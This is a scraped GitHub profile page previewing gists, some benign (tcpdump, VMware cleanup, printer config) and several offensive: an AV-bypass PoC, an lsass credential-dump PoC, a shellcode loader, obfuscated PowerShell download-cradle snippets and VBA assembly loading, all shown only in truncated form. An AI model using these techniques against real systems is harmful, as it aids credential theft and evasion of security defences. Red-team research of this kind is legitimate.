Skip to content

Instantly share code, notes, and snippets.

View davehardy20's full-sized avatar

Dave Hardy davehardy20

101 followers · 286 following
  • UK
View GitHub Profile
@tcpdump-examples
tcpdump-examples / tcpdump.md
Last active April 18, 2024 13:14

Tcpdump is a CLI tool to capture raw network packets. This is useful for various forms of network troubleshooting. This cheat sheet covers all the basic and advanced options for tcpdump.

Tcpdump cheat sheet

how-to-use-tcpdump

Tcpdump command is a famous network packet analyzing tool that is used to display TCP\IP & other network packets being transmitted over the network attached to the system on which tcpdump has been installed. Tcpdump uses libpcap library to capture the network packets & is available on almost all Linux/Unix flavors.

Capture ICMP Packets With Tcpdump

@broestls
broestls / Remove_VMwareTools.ps1
Last active April 28, 2024 14:05
Force removal of VMware Tools, Program Files, and Windows Services
# This script will manually rip out all VMware Tools registry entries and files for Windows 2008-2019
# Tested for 2019, 2016, and probably works on 2012 R2 after the 2016 fixes.
# This function pulls out the common ID used for most of the VMware registry entries along with the ID
# associated with the MSI for VMware Tools.
function Get-VMwareToolsInstallerID {
foreach ($item in $(Get-ChildItem Registry::HKEY_CLASSES_ROOT\Installer\Products)) {
If ($item.GetValue('ProductName') -eq 'VMware Tools') {
return @{
reg_id = $item.PSChildName;
@theevilbit
theevilbit / divide_and_conquer.c
Created January 17, 2021 15:11
Divide and Conquer NextGen AV bypass
/*
This is a POC for a generic technique I called internally on our red team assessment "Divide and Conquer", which can be used to bypass behavioral based NextGen AV detection. It works by splitting malicious actions and API calls into distinct processes.
*/
#include <stdio.h>
#include <tchar.h>
#include <windows.h>
#include "Commctrl.h"
#include <string>
@BugHunter001
BugHunter001 / Bug_Bounty_tips
Last active January 21, 2023 10:13
site.com/file.php
response = nothing
http://site.com/file.php~
response = source
-------------------------------------
https://github.com/kleiton0x00/CRLF-one-liner
------------------------------------------
try to add admin as your user,
change his email to yours,
@jthuraisamy
jthuraisamy / loaded_psp_drivers.cpp
Last active October 15, 2023 03:01
Loaded Security Product Drivers
#include <Windows.h>
#include <ImageHlp.h>
#include <strsafe.h>
#include "loaded_psp_drivers.h"
#include <set>
#include <string>
#include <algorithm>
#pragma comment(lib, "crypt32.lib")
@GeneralTesler
GeneralTesler / refl.cpp
Last active November 6, 2023 12:15
PoC using RtlCreateProcessReflection + MiniDumpWriteDump to dump lsass.exe process memory
#include <Windows.h>
#include <iostream>
#include <DbgHelp.h>
#include <processsnapshot.h>
#include <TlHelp32.h>
#include <processthreadsapi.h>
//process reflection stuff copied from: https://github.com/hasherezade/pe-sieve/blob/master/utils/process_reflection.cpp
//minidump/process searching copied from: https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsass-passwords-without-mimikatz-minidumpwritedump-av-signature-bypass
//compile using: cl.exe refl.cpp /DUNICODE
@mihaiserban
mihaiserban / printer.cfg
Last active April 27, 2024 22:58
Klipper Ender 5 Plus stock printer config
# This file contains pin mappings for the Creality Ender 5 Plus.
# Ender 5 Plus stock uses a Creality v2.2 board, similar to CR-20 Pro.
# To use this config, the firmware should be compiled for the AVR atmega2560.
# See the example.cfg file for a description of available parameters.
[stepper_x]
step_pin: PF0
dir_pin: PF1
enable_pin: !PD7
@mgeeky
mgeeky / shellcodeLoader.go
Created May 13, 2020 21:15
Simple Shellcode loader implemented in Golang
//
// Simple Shellcode loader implemented in Golang.
//
// Compilation:
// $ go build -o foo.exe shellcodeLoader.go
//
// Mariusz B. / mgeeky (@mariuszbit), '20
// <mb@binary-offensive.com>
//
@mgeeky
mgeeky / Download-Cradles-Oneliners.md
Last active January 8, 2024 14:06
Various Powershell Download Cradles purposed as one-liners

Download Cradles

0) Extra goodies

  • Obfuscated FromBase64String with -bxor nice for dynamic strings deobfuscation:
$t=([type]('{1}{0}'-f'vert','Con'));($t::(($t.GetMethods()|?{$_.Name-clike'F*g'}).Name).Invoke('Yk9CA05CA0hMV0I=')|%{$_-bxor35}|%{[char]$_})-join''
  • The same as above but for UTF-16 base64 encoded strings:
@monoxgas
monoxgas / mscorlib_load_assembly.vba
Last active May 18, 2023 13:30
VBA code for calling AppDomain.Load using raw vtable lookups for the IUnknown
' Need to add project references to C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscoree.tlb and mscorlib.tlb
Private Declare PtrSafe Function DispCallFunc Lib "oleaut32.dll" (ByVal pv As LongPtr, ByVal ov As LongPtr, ByVal cc As Integer, ByVal vr As Integer, ByVal ca As Long, ByRef pr As Integer, ByRef pg As LongPtr, ByRef par As Variant) As Long
Private Declare PtrSafe Sub RtlMoveMemory Lib "kernel32" (Dst As Any, Src As Any, ByVal BLen As LongPtr)
Private Declare PtrSafe Function VarPtrArray Lib "VBE7" Alias "VarPtr" (ByRef Var() As Any) As LongPtr
#If Win64 Then
Const LS As LongPtr = 8&
#Else
Const LS As LongPtr = 4&